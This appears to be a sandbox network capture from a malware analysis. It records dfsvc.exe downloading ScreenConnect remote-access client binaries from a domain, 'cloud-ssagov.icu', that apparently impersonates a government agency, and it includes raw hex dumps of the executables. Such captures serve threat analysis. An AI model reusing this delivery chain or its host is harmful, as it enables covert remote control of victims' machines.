                                                                                                                        2024-11-13 17:18:15 UTC16384INData Raw: 70 17 8d 15 00 00 01 25 16 09 a2 28 00 02 00 0a 28 93 00 00 0a 14 04 05 16 28 ba 00 00 06 13 06 de 11 09 28 01 02 00 0a dc 06 2c 06 06 6f 11 00 00 0a dc 11 06 2a 00 00 01 34 00 00 02 00 99 00 0a a3 00 0c 00 00 00 00 02 00 81 00 2e af 00 0c 00 00 00 00 02 00 73 00 87 fa 00 07 00 00 00 00 02 00 06 00 fb 01 01 0a 00 00 00 00 13 30 02 00 1f 00 00 00 2a 00 00 11 1f 28 7e 5e 00 00 0a 28 e0 00 00 06 72 71 06 00 70 28 02 02 00 0a 0a 02 06 28 bd 00 00 06 2a 00 13 30 05 00 47 00 00 00 00 00 00 00 03 25 2d 06 26 28 be 00 00 06 18 8d d9 00 00 01 25 16 72 9d 06 00 70 a2 25 17 72 b9 06 00 70 a2 28 03 02 00 0a 7e a7 00 00 04 25 2d 13 26 14 fe 06 04 02 00 0a 73 05 02 00 0a 25 80 a7 00 00 04 02 28 32 00 00 2b 2a 00 1b 30 04 00 90 00 00 00 3a 00 00 11 28 0d 01 00 06 1f 0a
                                                                                                                        Data Ascii: p%((((,o*4.s0*(~^(rqp((*0G%-&(%rp%rp(~%-&s%(2+*0:(
                                                                                                                        2024-11-13 17:18:16 UTC16384INData Raw: 00 04 1b 28 aa 01 00 06 7d fc 00 00 04 2b 2e 02 02 7b fc 00 00 04 7d f8 00 00 04 02 17 7d f7 00 00 04 17 2a 02 15 7d f7 00 00 04 02 02 7b fc 00 00 04 18 28 aa 01 00 06 7d fc 00 00 04 02 7b fc 00 00 04 16 d3 28 84 00 00 0a 2d c3 16 2a 1e 02 7b f8 00 00 04 2a 1a 73 7b 01 00 0a 7a 32 02 7b f8 00 00 04 8c ce 00 00 01 2a 00 00 13 30 02 00 3c 00 00 00 88 00 00 11 02 7b f7 00 00 04 1f fe 33 1d 02 7b f9 00 00 04 28 4e 03 00 0a 6f 4f 03 00 0a 33 0b 02 16 7d f7 00 00 04 02 0a 2b 07 16 73 4d 03 00 06 0a 06 02 7b fb 00 00 04 7d fa 00 00 04 06 2a 1e 02 28 53 03 00 06 2a 7a 02 28 2c 00 00 0a 02 03 7d fd 00 00 04 02 28 4e 03 00 0a 6f 4f 03 00 0a 7d ff 00 00 04 2a 06 2a 00 00 00 13 30 05 00 d5 00 00 00 89 00 00 11 02 7b fd 00 00 04 0a 06 2c 09 06 17 3b 8d 00 00 00 16 2a
                                                                                                                        Data Ascii: (}+.{}}*}{(}{(-*{*s{z2{*0<{3{(NoO3}+sM{}*(S*z(,}(NoO}**0{,;*
                                                                                                                        2024-11-13 17:18:16 UTC16384INData Raw: f2 25 56 80 d4 15 f2 25 06 00 af 54 6e 22 06 00 ba 90 6e 22 06 00 71 cc 6e 22 06 00 48 cf 6e 22 06 00 5e 3e 6e 22 06 00 9f a3 6e 22 06 00 c4 b2 a0 02 06 00 36 b2 6e 22 06 00 49 a7 a0 02 06 00 41 a7 6e 22 06 00 81 cc 6e 22 06 00 af 54 6e 22 06 00 ba 90 6e 22 06 00 9f a3 6e 22 06 00 7c aa 6e 22 06 00 f7 cf 71 22 06 00 ce 45 71 22 06 00 66 46 6e 22 06 00 07 59 6e 22 06 00 b6 bf 6e 22 06 00 31 6a 6e 22 06 00 8f 9f 6e 22 06 00 e8 60 6e 22 06 00 48 cf 6e 22 06 00 f4 5f 6e 22 06 00 04 52 25 25 06 00 e3 be 6e 22 06 00 5b be 6e 22 06 10 55 51 f7 25 06 06 80 30 af 08 56 80 80 c8 fb 25 56 80 69 c8 fb 25 06 06 80 30 af 08 56 80 35 9d 00 26 06 06 80 30 af 08 56 80 62 27 05 26 56 80 90 29 05 26 56 80 e3 0d 05 26 56 80 86 29 05 26 06 06 80 30 6e 22 56 80 2c 39 0a 26 56
                                                                                                                        Data Ascii: %V%Tn"n"qn"Hn"^>n"n"6n"IAn"n"Tn"n"n"|n"q"Eq"fFn"Yn"n"1jn"n"`n"Hn"_n"R%%n"[n"UQ%0V%Vi%0V5&0Vb'&V)&V&V)&0n"V,9&V
                                                                                                                        2024-11-13 17:18:16 UTC16384INData Raw: 00 00 00 00 c6 00 21 5b 10 00 0e 07 4b a5 00 00 00 00 c6 00 5e 53 10 00 0f 07 5e a5 00 00 00 00 91 18 18 99 0e 27 10 07 6a a5 00 00 00 00 86 18 ed 98 01 00 10 07 72 a5 00 00 00 00 83 00 d7 02 29 3b 10 07 7a a5 00 00 00 00 83 00 81 0a 30 3b 12 07 82 a5 00 00 00 00 86 18 ed 98 01 00 13 07 8a a5 00 00 00 00 83 00 d6 07 1b 3b 13 07 9d a5 00 00 00 00 91 18 18 99 0e 27 14 07 a9 a5 00 00 00 00 86 18 ed 98 01 00 14 07 b1 a5 00 00 00 00 83 00 ab 02 39 3b 14 07 b9 a5 00 00 00 00 83 00 55 0a 39 3b 15 07 c1 a5 00 00 00 00 86 18 ed 98 05 00 16 07 e0 a5 00 00 00 00 e1 01 ac 58 01 00 17 07 18 a6 00 00 00 00 e1 01 37 c2 3d 00 17 07 e4 a7 00 00 00 00 81 00 d5 0d 01 00 17 07 00 a8 00 00 00 00 e1 09 d0 bb e0 18 17 07 08 a8 00 00 00 00 e1 01 13 b6 01 00 17 07 0f a8 00 00 00
                                                                                                                        Data Ascii: ![K^S^'jr);z0;;'9;U9;X7=
                                                                                                                        2024-11-13 17:18:16 UTC16384INData Raw: 52 0f 3b 10 44 04 5f 46 99 1a 3c 04 86 99 a0 02 3c 04 5b 34 45 10 a9 06 0b 5f 39 02 3c 04 8d 4a a0 02 91 04 5f 46 01 00 89 06 8d 58 39 02 d1 03 86 c7 01 00 69 04 a6 58 01 00 71 09 dc 37 b1 1a 71 09 1c 36 89 01 59 06 ab cc e9 1a e1 02 ed 98 f8 1a e1 02 ed 98 07 1b 41 06 ed 98 10 00 b9 08 ae 9e 16 1b 19 0a 85 3e 1d 1b 29 02 96 4c 7c 04 31 02 ed 98 01 00 99 04 68 53 f5 09 c1 09 21 5b 10 00 39 02 96 4c 7c 04 39 02 35 70 89 01 99 02 e2 6a 7c 04 99 02 28 59 3b 1b b1 07 1b 6b 3d 0b 4c 04 a8 98 5b 00 54 04 b5 bc 49 00 44 02 ab 0d d9 00 08 00 14 00 25 1c 08 00 18 00 2a 1c 08 00 1c 00 2f 1c 08 00 20 00 34 1c 08 00 b8 00 39 1c 0e 00 bc 00 3e 1c 0e 00 c0 00 51 1c 0e 00 c4 00 62 1c 08 00 c8 00 75 1c 08 00 cc 00 7a 1c 0e 00 d0 00 7f 1c 0e 00 d4 00 8e 1c 0e 00 d8 00 9d
                                                                                                                        Data Ascii: R;D_F<<[4E_9<J_FX9iXq7q6YA>)L|1hS![9L|95pj|(Y;k=L[TID%*/ 49>Qbuz
                                                                                                                        2024-11-13 17:18:16 UTC16384INData Raw: 63 65 53 6f 75 72 63 65 73 3e 62 5f 5f 33 5f 31 00 3c 3e 39 5f 5f 31 33 35 5f 31 00 3c 47 65 74 46 75 6c 6c 45 78 65 63 75 74 61 62 6c 65 50 61 74 68 3e 62 5f 5f 31 33 35 5f 31 00 3c 3e 63 5f 5f 44 69 73 70 6c 61 79 43 6c 61 73 73 34 37 5f 31 00 3c 43 6f 6e 6e 65 63 74 53 65 72 76 65 72 43 6c 69 65 6e 74 4e 61 6d 65 64 50 69 70 65 73 3e 67 5f 5f 57 61 69 74 41 6e 64 43 6f 6e 6e 65 63 74 4e 61 6d 65 64 50 69 70 65 7c 39 37 5f 31 00 3c 50 6f 70 75 6c 61 74 65 43 6f 6e 74 65 78 74 4d 65 6e 75 53 74 72 69 70 49 74 65 6d 73 3e 62 5f 5f 37 5f 31 00 3c 3e 39 5f 5f 38 5f 31 00 3c 50 6f 70 75 6c 61 74 65 43 6f 6e 74 65 78 74 4d 65 6e 75 53 74 72 69 70 49 74 65 6d 73 3e 62 5f 5f 38 5f 31 00 3c 3e 39 5f 5f 32 39 5f 31 00 3c 54 72 79 47 65 74 41 63 74 69 76 65 43 6f
                                                                                                                        Data Ascii: ceSources>b__3_1<>9__135_1<GetFullExecutablePath>b__135_1<>c__DisplayClass47_1<ConnectServerClientNamedPipes>g__WaitAndConnectNamedPipe|97_1<PopulateContextMenuStripItems>b__7_1<>9__8_1<PopulateContextMenuStripItems>b__8_1<>9__29_1<TryGetActiveCo
                                                                                                                        2024-11-13 17:18:16 UTC16384INData Raw: 6e 64 6c 65 00 77 69 6e 64 6f 77 48 61 6e 64 6c 65 00 62 61 73 65 4b 65 79 48 61 6e 64 6c 65 00 6c 69 62 72 61 72 79 48 61 6e 64 6c 65 00 72 65 73 75 6d 65 5f 68 61 6e 64 6c 65 00 54 6f 52 65 63 74 61 6e 67 6c 65 00 47 65 74 43 6c 69 65 6e 74 52 65 63 74 61 6e 67 6c 65 00 47 65 74 57 69 6e 64 6f 77 52 65 63 74 61 6e 67 6c 65 00 72 65 63 74 61 6e 67 6c 65 00 70 44 61 74 61 46 69 6c 65 00 75 6c 6c 54 6f 74 61 6c 50 61 67 65 46 69 6c 65 00 75 6c 6c 41 76 61 69 6c 50 61 67 65 46 69 6c 65 00 43 72 65 61 74 65 46 69 6c 65 00 68 54 65 6d 70 6c 61 74 65 46 69 6c 65 00 44 65 6c 65 74 65 46 69 6c 65 00 4d 6f 76 65 46 69 6c 65 00 70 43 6f 6e 66 69 67 46 69 6c 65 00 54 72 79 55 6e 62 6c 6f 63 6b 46 69 6c 65 00 4c 6f 61 64 52 65 73 6f 75 72 63 65 50 61 63 6b 46 72 6f
                                                                                                                        Data Ascii: ndlewindowHandlebaseKeyHandlelibraryHandleresume_handleToRectangleGetClientRectangleGetWindowRectanglerectanglepDataFileullTotalPageFileullAvailPageFileCreateFilehTemplateFileDeleteFileMoveFilepConfigFileTryUnblockFileLoadResourcePackFro
                                                                                                                        2024-11-13 17:18:16 UTC16384INData Raw: 75 72 72 65 6e 74 54 68 72 65 61 64 44 65 73 6b 74 6f 70 00 3c 39 3e 5f 5f 43 6c 6f 73 65 44 65 73 6b 74 6f 70 00 43 72 65 61 74 65 44 65 73 6b 74 6f 70 00 53 77 69 74 63 68 44 65 73 6b 74 6f 70 00 4f 70 65 6e 44 65 73 6b 74 6f 70 00 6c 70 44 65 73 6b 74 6f 70 00 54 72 79 45 6e 73 75 72 65 54 68 72 65 61 64 4f 6e 49 6e 70 75 74 44 65 73 6b 74 6f 70 00 4f 70 65 6e 49 6e 70 75 74 44 65 73 6b 74 6f 70 00 6c 70 73 7a 44 65 73 6b 74 6f 70 00 64 65 73 6b 74 6f 70 00 65 5f 73 70 00 55 72 69 53 63 68 65 6d 65 48 74 74 70 00 4e 61 74 69 76 65 43 6c 65 61 6e 75 70 00 6c 70 4c 6f 61 64 4f 72 64 65 72 47 72 6f 75 70 00 47 65 74 4c 61 73 74 41 63 74 69 76 65 50 6f 70 75 70 00 41 70 70 44 6f 6d 61 69 6e 53 65 74 75 70 00 70 73 7a 56 65 6e 64 6f 72 53 65 74 75 70 00 66
                                                                                                                        Data Ascii: urrentThreadDesktop<9>__CloseDesktopCreateDesktopSwitchDesktopOpenDesktoplpDesktopTryEnsureThreadOnInputDesktopOpenInputDesktoplpszDesktopdesktope_spUriSchemeHttpNativeCleanuplpLoadOrderGroupGetLastActivePopupAppDomainSetuppszVendorSetupf
                                                                                                                        2024-11-13 17:18:16 UTC16384INData Raw: 72 43 72 65 61 74 65 52 65 67 69 73 74 72 79 4b 65 79 00 4f 70 65 6e 52 65 67 69 73 74 72 79 4b 65 79 00 43 72 65 61 74 65 50 72 6f 70 65 72 74 79 4b 65 79 00 47 65 74 48 6f 74 6b 65 79 00 53 65 74 48 6f 74 6b 65 79 00 70 77 48 6f 74 6b 65 79 00 53 79 73 74 65 6d 2e 53 65 63 75 72 69 74 79 2e 43 72 79 70 74 6f 67 72 61 70 68 79 00 67 65 74 5f 41 73 73 65 6d 62 6c 79 00 67 65 74 5f 46 6f 6e 74 46 61 6d 69 6c 79 00 44 65 66 61 75 6c 74 46 6f 6e 74 46 61 6d 69 6c 79 00 54 72 79 44 69 73 61 62 6c 65 46 69 6c 65 53 79 73 74 65 6d 52 65 64 69 72 65 63 74 69 6f 6e 54 65 6d 70 6f 72 61 72 69 6c 79 00 73 65 74 5f 52 65 61 64 4f 6e 6c 79 00 44 69 73 70 6f 73 65 51 75 69 65 74 6c 79 00 70 6f 69 6e 74 6c 79 00 53 65 6c 65 63 74 4d 61 6e 79 00 53 68 75 74 64 6f 77 6e
                                                                                                                        Data Ascii: rCreateRegistryKeyOpenRegistryKeyCreatePropertyKeyGetHotkeySetHotkeypwHotkeySystem.Security.Cryptographyget_Assemblyget_FontFamilyDefaultFontFamilyTryDisableFileSystemRedirectionTemporarilyset_ReadOnlyDisposeQuietlypointlySelectManyShutdown


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        9192.168.2.449761185.49.126.734436996C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2024-11-13 17:18:18 UTC124OUTGET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1
                                                                                                                        Host: cloud-ssagov.icu
                                                                                                                        Accept-Encoding: gzip
                                                                                                                        Connection: Keep-Alive
                                                                                                                        2024-11-13 17:18:18 UTC235INHTTP/1.1 200 OK
                                                                                                                        Cache-Control: private
                                                                                                                        Content-Length: 602392
                                                                                                                        Content-Type: text/html
                                                                                                                        Server: Microsoft-HTTPAPI/2.0
                                                                                                                        X-Robots-Tag: noindex
                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                        Date: Wed, 13 Nov 2024 17:18:18 GMT
                                                                                                                        Connection: close
                                                                                                                        2024-11-13 17:18:18 UTC16149INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 db c1 bb 82 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 00 09 00 00 06 00 00 00 00 00 00 a2 19 09 00 00 20 00 00 00 20 09 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 09 00 00 02 00 00 0b 89 09 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL"0 @ `@
                                                                                                                        2024-11-13 17:18:18 UTC16384INData Raw: 32 00 00 2b 28 ce 01 00 0a 0a 06 25 2d 06 26 7e b1 00 00 0a 2a 00 00 1b 30 06 00 20 0f 00 00 2c 00 00 11 73 b0 07 00 06 0a 06 02 7d 14 03 00 04 28 75 01 00 0a 2c 1c 72 9d 0a 00 70 17 17 28 76 01 00 0a 28 77 01 00 0a 16 8d 11 00 00 01 28 78 01 00 0a 02 17 7d 48 00 00 04 02 28 e4 00 00 06 17 28 cf 01 00 0a 0b 02 28 fd 00 00 06 0c 02 28 dc 00 00 06 7e a9 02 00 04 25 2d 17 26 7e 96 02 00 04 fe 06 2a 07 00 06 73 d0 01 00 0a 25 80 a9 02 00 04 28 33 00 00 2b 6f d1 01 00 0a 0d 38 55 0d 00 00 12 04 09 6f d2 01 00 0a 7d 16 03 00 04 11 04 7b 16 03 00 04 28 2c 00 00 2b 13 05 11 04 7b 16 03 00 04 6f 15 03 00 06 28 3b 06 00 06 13 06 11 04 7b 16 03 00 04 6f 29 03 00 06 28 4f 06 00 06 13 07 11 04 7b 16 03 00 04 6f 2a 03 00 06 28 4f 06 00 06 13 08 11 04 7b 16 03 00 04 6f
                                                                                                                        Data Ascii: 2+(%-&~*0 ,s}(u,rp(v(w(x}H((((~%-&~*s%(3+o8Uo}{(,+{o(;{o)(O{o*(O{o
                                                                                                                        2024-11-13 17:18:18 UTC16384INData Raw: 26 7e 96 02 00 04 fe 06 62 07 00 06 73 d0 01 00 0a 25 80 e1 02 00 04 28 4b 00 00 2b 7d 72 03 00 04 06 7b 72 03 00 04 2c 60 06 7b 71 03 00 04 2c 47 06 7b 72 03 00 04 28 2c 00 00 2b 18 7d 78 02 00 04 06 fe 06 0e 08 00 06 73 b5 00 00 0a 14 28 b6 00 00 0a 26 06 7b 72 03 00 04 6f 16 03 00 06 06 7b 72 03 00 04 28 2c 00 00 2b 7b 78 02 00 04 19 fe 01 6f 10 03 00 0a 06 7b 72 03 00 04 28 2c 00 00 2b 16 7d 78 02 00 04 2a 00 13 30 03 00 43 00 00 00 46 00 00 11 02 03 28 b3 00 00 06 03 2d 21 02 7b 54 00 00 04 25 2d 04 26 16 2b 05 28 da 00 00 0a 2c 0d 02 7b 54 00 00 04 16 6f a2 00 00 0a 2a 03 2c 14 20 00 00 10 00 17 12 00 fe 15 c4 00 00 1b 06 28 09 06 00 06 2a 22 02 03 28 b1 00 00 06 2a a6 02 7b 5a 00 00 04 28 aa 00 00 06 6f b8 04 00 06 02 04 6f 11 03 00 0a 28 2e 01 00
                                                                                                                        Data Ascii: &~bs%(K+}r{r,`{q,G{r(,+}xs(&{ro{r(,+{xo{r(,+}x*0CF(-!{T%-&+(,{To*, (*"(*{Z(oo(.
                                                                                                                        2024-11-13 17:18:18 UTC16384INData Raw: 06 9f 01 00 06 73 1a 04 00 0a 28 ac 00 00 2b 25 0a 28 98 01 00 06 06 a2 28 ad 00 00 2b 25 0b 7d 85 00 00 04 07 a2 2a 52 02 28 97 01 00 06 6f 1c 04 00 0a 2d 06 02 6f 9b 01 00 06 2a 32 02 28 97 01 00 06 6f 1c 04 00 0a 2a 52 03 02 25 fe 07 9a 01 00 06 73 83 01 00 0a 6f 1d 04 00 0a 2a 4e 03 02 fe 06 a0 01 00 06 73 83 01 00 0a 6f 1e 04 00 0a 2a 1e 02 6f 9b 01 00 06 2a 00 13 30 04 00 43 00 00 00 62 00 00 11 73 45 08 00 06 0a 06 03 7d 94 03 00 04 02 7b 88 00 00 04 2d 10 02 7e 1f 04 00 0a 73 20 04 00 0a 7d 88 00 00 04 02 7b 88 00 00 04 06 7b 94 03 00 04 06 fe 06 46 08 00 06 73 21 04 00 0a 28 ae 00 00 2b 2a 1e 02 28 46 00 00 0a 2a 62 02 28 22 04 00 0a 02 03 72 02 20 00 70 28 af 00 00 2b 7d 89 00 00 04 2a 13 30 04 00 70 00 00 00 63 00 00 11 73 47 08 00 06 0a 06 02
                                                                                                                        Data Ascii: s(+%((+%}*R(o-o*2(o*R%so*Nso*o*0CbsE}{-~s }{{Fs!(+*(F*b("r p(+}*0pcsG
                                                                                                                        2024-11-13 17:18:18 UTC16384INData Raw: 16 2a ba 02 03 28 5f 05 00 0a 02 17 28 bb 02 00 06 02 02 28 ac 02 00 06 2d 08 02 28 b8 02 00 06 2d 03 14 2b 06 02 6f 62 04 00 0a 6f c0 02 00 06 2a 5a 02 03 28 60 05 00 0a 02 16 28 bb 02 00 06 02 14 6f c0 02 00 06 2a 00 00 00 13 30 03 00 13 00 00 00 92 00 00 11 02 28 f8 00 00 2b 0a 06 2c 08 06 02 03 6f 61 05 00 0a 2a 00 13 30 02 00 6e 00 00 00 93 00 00 11 02 28 62 05 00 0a 2d 1d 02 28 b0 02 00 06 12 00 fe 15 1d 00 00 01 06 28 63 05 00 0a 2c 07 02 28 b0 02 00 06 2a 02 7b ef 00 00 04 2c 1d 02 28 ae 02 00 06 12 00 fe 15 1d 00 00 01 06 28 63 05 00 0a 2c 07 02 28 ae 02 00 06 2a 02 28 be 01 00 06 12 00 fe 15 1d 00 00 01 06 28 63 05 00 0a 2c 07 02 28 be 01 00 06 2a 02 6f c4 02 00 06 2a 7a 02 7b ef 00 00 04 2c 0f 02 28 a8 02 00 06 2c 07 02 28 a8 02 00 06 2a 02 28
                                                                                                                        Data Ascii: *(_((-(-+obo*Z(`(o*0(+,oa*0n(b-((c,(*{,((c,(*((c,(*o*z{,(,(*(
                                                                                                                        2024-11-13 17:18:18 UTC16384INData Raw: 04 00 0a a2 25 18 73 2a 04 00 0a 25 18 6f c9 02 00 0a 25 1f 2a 28 34 05 00 06 6f 02 06 00 0a 25 28 04 06 00 0a 6f 13 04 00 0a 0e 04 7e a4 04 00 04 25 2d 17 26 7e a3 04 00 04 fe 06 ed 09 00 06 73 05 06 00 0a 25 80 a4 04 00 04 28 49 01 00 2b 28 4a 01 00 2b a2 6f 40 04 00 0a 06 02 17 14 28 4b 01 00 2b 28 4c 01 00 2b 7d a6 04 00 04 02 06 7b a6 04 00 04 28 4d 01 00 2b 28 5d 04 00 0a 02 06 7b a6 04 00 04 28 4e 01 00 2b 28 5e 04 00 0a 06 06 fe 06 ef 09 00 06 73 83 01 00 0a 7d a7 04 00 04 06 7b a6 04 00 04 06 fe 06 f0 09 00 06 73 5c 04 00 0a 28 4f 01 00 2b 2a 32 02 7b 36 01 00 04 6f 62 04 00 0a 2a 36 02 7b 36 01 00 04 03 6f 00 02 00 0a 2a 1e 02 7b 37 01 00 04 2a 22 02 03 7d 37 01 00 04 2a 00 13 30 05 00 64 00 00 00 00 00 00 00 02 03 04 05 0e 04 28 79 03 00 06 02
                                                                                                                        Data Ascii: %s*%o%*(4o%(o~%-&~s%(I+(J+o@(K+(L+}{(M+(]{(N+(^s}{s\(O+*2{6ob*6{6o*{7*"}7*0d(y
                                                                                                                        2024-11-13 17:18:19 UTC16384INData Raw: 04 05 00 04 fe 06 63 0a 00 06 73 aa 07 00 0a 25 80 0b 05 00 04 28 99 01 00 2b 2d 05 1a 13 04 de 18 de 14 07 2c 06 07 6f 22 00 00 0a dc 06 2c 06 06 6f 22 00 00 0a dc 17 2a 11 04 2a 00 00 00 41 34 00 00 02 00 00 00 6d 00 00 00 1f 01 00 00 8c 01 00 00 0a 00 00 00 00 00 00 00 02 00 00 00 67 00 00 00 2f 01 00 00 96 01 00 00 0a 00 00 00 00 00 00 00 32 02 7b 01 05 00 04 6f ab 07 00 0a 2a 00 00 00 1b 30 05 00 e4 00 00 00 f1 00 00 11 73 89 0a 00 06 0a 06 02 7d 40 05 00 04 06 03 7d 3b 05 00 04 28 60 07 00 0a 28 ac 07 00 0a 73 59 0a 00 06 0b 06 07 6f 80 00 00 0a 73 5a 0a 00 06 7d 3c 05 00 04 06 06 7b 3b 05 00 04 6f ad 07 00 0a 0c 12 02 28 ae 07 00 0a 06 7b 3b 05 00 04 6f ad 07 00 0a 0c 12 02 28 af 07 00 0a 1f 20 17 28 b0 07 00 0a 7d 3d 05 00 04 06 06 7b 3b 05 00 04
                                                                                                                        Data Ascii: cs%(+-,o",o"**A4mg/2{o*0s}@};(`(sYosZ}<{;o({;o( (}={;
                                                                                                                        2024-11-13 17:18:19 UTC16384INData Raw: 80 01 02 00 04 20 8f 00 00 00 28 37 06 00 06 80 02 02 00 04 20 ff 00 00 00 28 37 06 00 06 80 03 02 00 04 16 28 37 06 00 06 80 04 02 00 04 20 96 00 00 00 28 37 06 00 06 80 06 02 00 04 1b 8d d3 02 00 01 25 d0 64 02 00 04 28 ba 04 00 0a 80 07 02 00 04 1f 11 8d d3 02 00 01 25 d0 65 02 00 04 28 ba 04 00 0a 80 08 02 00 04 22 00 00 80 3f 22 00 00 80 3f 22 00 00 80 3f 22 00 00 00 3f 28 38 05 00 06 80 09 02 00 04 22 33 33 33 3f 22 33 33 33 3f 22 33 33 33 3f 22 00 00 80 3f 28 38 05 00 06 80 0a 02 00 04 1e 28 34 05 00 06 80 0b 02 00 04 1a 28 34 05 00 06 73 ca 04 00 0a 80 0c 02 00 04 1f 18 1f 18 28 35 05 00 06 80 0d 02 00 04 1f 10 1f 10 28 35 05 00 06 80 0e 02 00 04 1f 18 1f 18 28 35 05 00 06 80 0f 02 00 04 1f 21 1f 10 28 35 05 00 06 80 10 02 00 04 1f 20 1f 10 28 35
                                                                                                                        Data Ascii: (7 (7(7 (7%d(%e("?"?"?"?(8"333?"333?"333?"?(8(4(4s(5(5(5!(5 (5
                                                                                                                        2024-11-13 17:18:19 UTC16384INData Raw: 6f 98 09 00 0a 04 2c 07 06 04 6f 98 09 00 0a 25 28 01 02 00 0a 28 01 02 00 0a 28 77 01 00 0a 06 6f 99 09 00 0a 28 dc 04 00 0a 7d 18 06 00 04 fe 06 f1 0b 00 06 73 38 02 00 0a 14 28 39 02 00 0a 26 2a 00 13 30 05 00 89 00 00 00 3f 01 00 11 73 f6 0b 00 06 0a 06 0e 06 7d 1d 06 00 04 06 03 04 05 0e 04 73 79 03 00 06 7d 1e 06 00 04 02 28 9a 09 00 0a 0b 06 7b 1e 06 00 04 06 fe 06 f7 0b 00 06 73 9f 01 00 0a 6f a0 01 00 0a 0e 05 2c 1a 06 7b 1e 06 00 04 07 6f da 02 00 0a 26 06 7b 1e 06 00 04 6f d8 01 00 0a 2b 28 0e 07 2c 0d 0e 07 06 7b 1e 06 00 04 6f 9b 09 00 0a 06 7b 1e 06 00 04 07 6f 9c 09 00 0a 06 7b 1e 06 00 04 6f dc 02 00 0a 06 7b 1e 06 00 04 2a 62 03 04 05 0e 04 73 79 03 00 06 25 02 6f da 02 00 0a 26 6f 7c 03 00 06 2a 00 00 13 30 02 00 34 00 00 00 40 01 00 11
                                                                                                                        Data Ascii: o,o%(((wo(}s8(9&*0?s}sy}({so,{o&{o+(,{o{o{o{*bsy%o&o|*04@
                                                                                                                        2024-11-13 17:18:19 UTC16384INData Raw: 0d 0b 00 0a 2a 00 00 13 30 02 00 2f 00 00 00 87 01 00 11 02 03 28 08 0b 00 0a 0a 12 00 28 ea 02 00 0a 2c 0d 12 00 28 77 09 00 0a 73 e8 02 00 0a 2a 7e 49 01 00 04 03 6f 0e 0b 00 0a 28 0a 0b 00 0a 2a 36 03 02 28 0b 0b 00 0a 73 67 0c 00 06 2a 2e 73 fd 06 00 06 80 6b 02 00 04 2a 1e 02 28 46 00 00 0a 2a 1e 03 6f 0f 0b 00 0a 2a 2e 73 00 07 00 06 80 6d 02 00 04 2a 1e 02 28 46 00 00 0a 2a 42 03 28 c7 08 00 0a 2c 07 03 17 28 10 0b 00 0a 2a 66 03 28 c7 08 00 0a 2c 10 03 28 11 0b 00 0a 8e 2d 07 03 16 28 10 0b 00 0a 2a 2e 73 04 07 00 06 80 70 02 00 04 2a 1e 02 28 46 00 00 0a 2a 2a 03 7b f4 00 00 0a 14 fe 03 2a 1e 02 28 46 00 00 0a 2a 62 03 6f 12 0b 00 0a 02 7c 72 02 00 04 7b 13 0b 00 0a 59 28 14 0b 00 0a 2a 1e 02 28 46 00 00 0a 2a 13 30 02 00 57 00 00 00 00 00 00 00
                                                                                                                        Data Ascii: *0/((,(ws*~Io(*6(sg*.sk*(F*o*.sm*(F*B(,(*f(,(-(*.sp*(F**{*(F*bo|r{Y(*(F*0W


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        10192.168.2.449762185.49.126.734436996C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2024-11-13 17:18:20 UTC93OUTGET /Bin/ScreenConnect.Client.dll HTTP/1.1
                                                                                                                        Host: cloud-ssagov.icu
                                                                                                                        Accept-Encoding: gzip
                                                                                                                        2024-11-13 17:18:20 UTC235INHTTP/1.1 200 OK
                                                                                                                        Cache-Control: private
                                                                                                                        Content-Length: 197120
                                                                                                                        Content-Type: text/html
                                                                                                                        Server: Microsoft-HTTPAPI/2.0
                                                                                                                        X-Robots-Tag: noindex
                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                        Date: Wed, 13 Nov 2024 17:18:20 GMT
                                                                                                                        Connection: close
                                                                                                                        2024-11-13 17:18:20 UTC16149INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 e7 02 f1 94 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 fa 02 00 00 06 00 00 00 00 00 00 96 18 03 00 00 20 00 00 00 20 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 03 00 00 02 00 00 23 92 03 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL" 0 `#@
